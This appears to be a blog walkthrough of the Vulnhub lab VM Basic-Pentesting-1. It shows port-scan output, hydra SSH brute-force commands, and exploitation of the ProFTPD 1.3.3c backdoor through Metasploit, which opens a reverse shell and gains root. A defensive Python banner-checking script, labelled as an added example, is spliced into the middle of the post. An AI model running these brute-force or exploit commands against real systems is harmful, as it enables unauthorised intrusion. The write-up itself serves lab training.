18 January 2022

Pentesting Fun Stuff

following the cyber security path…

Basic-Pentesting-1

This is another VM from Vulnhub (https://www.vulnhub.com/entry/basic-pentesting-1), created by Josiah Pierce.
It should be quite simple, but maybe there are some tricks I can learn from it.
As usual I start with Red Team Kit (RTK) for my initial scan.

██████╗ ███████╗██████╗     ████████╗███████╗ █████╗ ███╗   ███╗    ██╗  ██╗██╗████████╗
██╔══██╗██╔════╝██╔══██╗    ╚══██╔══╝██╔════╝██╔══██╗████╗ ████║    ██║ ██╔╝██║╚══██╔══╝
██████╔╝█████╗  ██║  ██║       ██║   █████╗  ███████║██╔████╔██║    █████╔╝ ██║   ██║
██╔══██╗██╔══╝  ██║  ██║       ██║   ██╔══╝  ██╔══██║██║╚██╔╝██║    ██╔═██╗ ██║   ██║
██║  ██║███████╗██████╔╝       ██║   ███████╗██║  ██║██║ ╚═╝ ██║    ██║  ██╗██║   ██║
╚═╝  ╚═╝╚══════╝╚═════╝        ╚═╝   ╚══════╝╚═╝  ╚═╝╚═╝     ╚═╝    ╚═╝  ╚═╝╚═╝   ╚═╝
Created by n0w4n
[-] Do you want to save the reports? (y/n) y
[-] Give path for saving the reports (example: /root/rtk/reports/): /root/vulnhub/basic-pentesting-1
[-] What is the IP address of the target? 192.168.100.140
[*] Checking connection to target
[*] Connection to 192.168.100.140 established
[*] Starting a Masscan to find open ports on the target
[*] This can take some time as this is for TCP and UDP
[*] Parsing output and loading up for further analysis
[*] Starting a TCP nmap scan on the target with acquired ports to retrieve all information
[*] This can take some time
[*] There are no open UDP ports
[*] Creating report
#############################################################################################
[*] Found the following open ports and services on the target:
21	tcp	  ftp ProFTPD 1.3.3c
22	tcp	  ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80	tcp	  http Apache httpd 2.4.18 ((Ubuntu))
#############################################################################################
[*] The following recommendations can be made:
[*] SSH
    Try bruteforcing with the commands:
      1.) hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.100.140 -t 4 ssh
      2.) hydra -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -P /usr/share/wordlists/rockyou.txt 192.168.100.140 -t 4 ssh
      (If nothing else works - try this as a last resort)
[*] FTP
    Anonymous login doesn't seem to be enabled!
[*] WEB
    To enumerate the directories run the command:
      1.) python3 <path to dirsearch>/dirsearch.py -u 192.168.100.140 -e php -r -f -x 400,403,404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
back to (m)ain menu or (e)xit this program?

Looks like an FTP server, an SSH server and a webserver are running.
The first thing I noticed is the version number of the FTP server, which has a known hard-coded backdoor.

root@kali:~/vulnhub/basic-pentesting-1# searchsploit ProFTPD 1.3.3c
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                           |  Path
                                                                                                                                                                         | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution                                                                                                       | exploits/linux/remote/15662.txt
ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)                                                                                                                 | exploits/linux/remote/16921.rb
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
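The version banner is the whole tell here, so it is worth automating that cross-check rather than eyeballing it. Below is an added example (not part of the original post, and not code from RTK or searchsploit) that parses service lines in the format RTK printed above and flags any banner matching a known-bad version table. The only real table entry is the one the page documents, ProFTPD 1.3.3c with its two Exploit-DB hits; the sample scan text is constructed from the post's output, and the data structures, regexes and function names are my own assumptions.

```python
"""Triage scanner service lines against a known-bad version table.

Added example; not part of the original post or of the RTK tool.
The sample scan lines are constructed from the output shown in the post.
"""
import re
from dataclasses import dataclass


@dataclass
class Service:
    port: int
    proto: str
    name: str      # service name as the scanner labelled it (ftp, ssh, http)
    banner: str    # product/version string reported by the scanner


# Constructed sample: the three lines RTK reported, tab-separated as printed.
SCAN_OUTPUT = """\
21\ttcp\t  ftp ProFTPD 1.3.3c
22\ttcp\t  ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80\ttcp\t  http Apache httpd 2.4.18 ((Ubuntu))
"""

# Known-bad (product regex, version regex, note). Only the ProFTPD entry is
# grounded in the page (the two searchsploit hits); in practice this table
# would be fed from a real advisory source.
ADVISORIES = [
    (re.compile(r"^ProFTPD$"), re.compile(r"^1\.3\.3c$"),
     "compromised-source backdoor (EDB-ID 15662 / 16921); "
     "reinstall from a clean build, a version patch does not remove it"),
]

# port <tab> proto <tab> [spaces] service-name [spaces] banner
LINE_RE = re.compile(r"^(\d+)\t(tcp|udp)\t\s*(\S+)\s*(.*)$")


def parse_scan(text: str) -> list[Service]:
    """Parse the port table; headers and separator lines are skipped."""
    services = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        port, proto, name, banner = m.groups()
        services.append(Service(int(port), proto, name, banner.strip()))
    return services


def split_banner(banner: str) -> tuple[str, str]:
    """Split 'Apache httpd 2.4.18 ((Ubuntu))' into ('Apache httpd', '2.4.18').

    The product is every token before the first one starting with a digit;
    that token is the version. Trailing OS/build noise is ignored.
    """
    tokens = banner.split()
    for i, tok in enumerate(tokens):
        if tok[0].isdigit():
            return " ".join(tokens[:i]), tok
    return banner, ""


def triage(services: list[Service]) -> list[tuple[int, str, str, str]]:
    """Return (port, product, version, note) for every advisory match."""
    findings = []
    for svc in services:
        product, version = split_banner(svc.banner)
        for prod_re, ver_re, note in ADVISORIES:
            if prod_re.match(product) and ver_re.match(version):
                findings.append((svc.port, product, version, note))
    return findings


if __name__ == "__main__":
    for port, product, version, note in triage(parse_scan(SCAN_OUTPUT)):
        print(f"[!] {port}/tcp {product} {version}: {note}")
```

Matching on an exact version string is deliberately strict: the backdoored build is a specific release, so a looser "1.3.x" match would produce noise on hosts that were never affected. Feeding the same parser a full nmap service table works as long as the columns keep the tab layout shown above.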

The webserver serves the default page, whose only content is the notification that it works.
I started dirsearch in the background and fired up Metasploit.

msf5 > use exploit/unix/ftp/proftpd_133c_backdoor
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > options
Module options (exploit/unix/ftp/proftpd_133c_backdoor):
   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target address range or CIDR identifier
   RPORT   21               yes       The target port (TCP)
Exploit target:
   Id  Name
   --  ----
   0   Automatic
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > set rhosts 192.168.100.140
rhosts => 192.168.100.140
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > exploit
[*] Started reverse TCP double handler on 192.168.100.137:4444
[*] 192.168.100.140:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Kj6LuRUqdvclX5vG;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "Kj6LuRUqdvclX5vG\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.100.137:4444 -> 192.168.100.140:32814) at 2019-02-13 22:22:52 +0100
id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
python -c 'import pty;pty.spawn("/bin/bash");'
root@vtcsec:/#

Well... the description stated it was for newcomers. The description also states there are other ways to get in.
But I think I'm gonna put some effort into another VM instead.
